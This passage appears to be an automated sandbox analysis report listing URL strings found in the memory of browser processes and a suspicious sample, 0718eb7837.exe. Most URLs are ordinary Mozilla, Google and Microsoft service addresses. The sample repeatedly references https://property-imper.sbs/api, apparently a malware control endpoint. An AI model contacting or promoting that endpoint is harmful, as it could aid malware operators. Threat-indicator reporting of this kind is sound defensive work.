Source: firefox.exe, 0000001E.00000003.2788970863.0000019DE7933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2791840293.0000019DE7930000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2792089306.0000019DE7930000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3365411007.0000024F7375F000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3334863235.0000024F70703000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: chrome.exe, 00000022.00000002.3008457453.00006DEC009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3008634598.00006DEC009E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3008634598.00006DEC009EB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2999305578.00006DEC0049C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://policies.google.com/
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3365411007.0000024F73723000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://profiler.firefox.com
Source: 0718eb7837.exe, 00000010.00000002.3097894570.00000000016B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs/
Source: 0718eb7837.exe, 0000000E.00000003.2695338579.000000000150D000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2695385436.0000000001519000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs/..
Source: 0718eb7837.exe, 0000000E.00000003.2694483547.00000000014F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs/4
Source: 0718eb7837.exe, 0000000E.00000003.2694420134.0000000001509000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2801637630.000000000151A000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2695385436.0000000001519000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2746298150.000000000150C000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2719534998.0000000001519000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2800427547.0000000005E92000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2659619178.000000000150D000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2718722019.000000000150C000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2718825525.0000000001519000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000002.3094604903.000000000165E000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000002.3100558424.00000000016EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs/api
Source: 0718eb7837.exe, 0000000E.00000003.2694420134.0000000001509000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs/api7
Source: 0718eb7837.exe, 00000010.00000002.3100558424.00000000016EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs/apiJ
Source: 0718eb7837.exe, 00000010.00000002.3094604903.000000000165E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs/api_
Source: 0718eb7837.exe, 0000000E.00000003.2718722019.000000000150C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs/apiatePr
Source: 0718eb7837.exe, 0000000E.00000003.2746364474.0000000001519000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2746298150.000000000150C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs/apid
Source: 0718eb7837.exe, 0000000E.00000003.2719534998.0000000001519000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2718722019.000000000150C000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2718825525.0000000001519000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs/apik
Source: 0718eb7837.exe, 0000000E.00000003.2746364474.0000000001519000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2746298150.000000000150C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs/apim
Source: 0718eb7837.exe, 0000000E.00000003.2719534998.0000000001519000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2718722019.000000000150C000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2718825525.0000000001519000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs/api~
Source: 0718eb7837.exe, 0000000E.00000003.2746725809.00000000014F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs/l
Source: 0718eb7837.exe, 00000010.00000002.3094604903.0000000001641000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs:443/api
Source: 0718eb7837.exe, 00000010.00000002.3094604903.0000000001641000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs:443/api:t
Source: 0718eb7837.exe, 00000010.00000002.3094604903.0000000001641000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs:443/apiK
Source: 0718eb7837.exe, 0000000E.00000003.2694420134.0000000001509000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs:443/apilowWarningViaUpgradechunkedTransfer-EncodingTrailerno-cachePragmaK
Source: 0718eb7837.exe, 00000010.00000002.3094604903.0000000001641000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs:443/apin
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3127317780.0000024F6446D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://relay.firefox.com/api/v1/
Source: chrome.exe, 00000022.00000002.2931029345.00006DEC00078000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/diagnostic?site=
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&p
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 0000001E.00000003.2787260190.0000019DE585A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3378129656.0000024F74BB2000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: chrome.exe, 00000022.00000002.2999783272.00006DEC004C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3006058560.00006DEC0081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3005873380.00006DEC0080C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000022.00000002.2999783272.00006DEC004C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3006058560.00006DEC0081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3005873380.00006DEC0080C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
Source: 0718eb7837.exe, 0000000E.00000003.2660134888.0000000005EF4000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2820636417.0000000005E9E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-engine-removal
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3317267748.0000024F701E2000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: 0718eb7837.exe, 00000010.00000003.2898670007.0000000005F63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 0718eb7837.exe, 00000010.00000003.2898670007.0000000005F63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.2031655381.00000000236B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: file.exe, 00000000.00000002.2130376795.0000000000CC5000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1893691030.000000001D201000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2660387207.0000000005EEE000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2660198162.0000000005EED000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2660134888.0000000005EF4000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2694274027.0000000005EEE000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2694547037.0000000005EEE000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2848517492.0000000005E95000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2850943174.0000000005E95000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2820636417.0000000005E9C000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2823245706.0000000005E95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: file.exe, 00000000.00000002.2130376795.0000000000CC5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe
Source: 0718eb7837.exe, 0000000E.00000003.2660198162.0000000005EC9000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2823245706.0000000005E70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: file.exe, 00000000.00000002.2130376795.0000000000CC5000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1893691030.000000001D201000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2660198162.0000000005EED000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2660134888.0000000005EF4000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2848517492.0000000005E95000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2850943174.0000000005E95000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2820636417.0000000005E9C000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2823245706.0000000005E95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: 0718eb7837.exe, 0000000E.00000003.2660198162.0000000005EC9000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2823245706.0000000005E70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: file.exe, 00000000.00000002.2130376795.0000000000CC5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: 0718eb7837.exe	String found in binary or memory: https://www.amazon.com/?tag=admarketus-
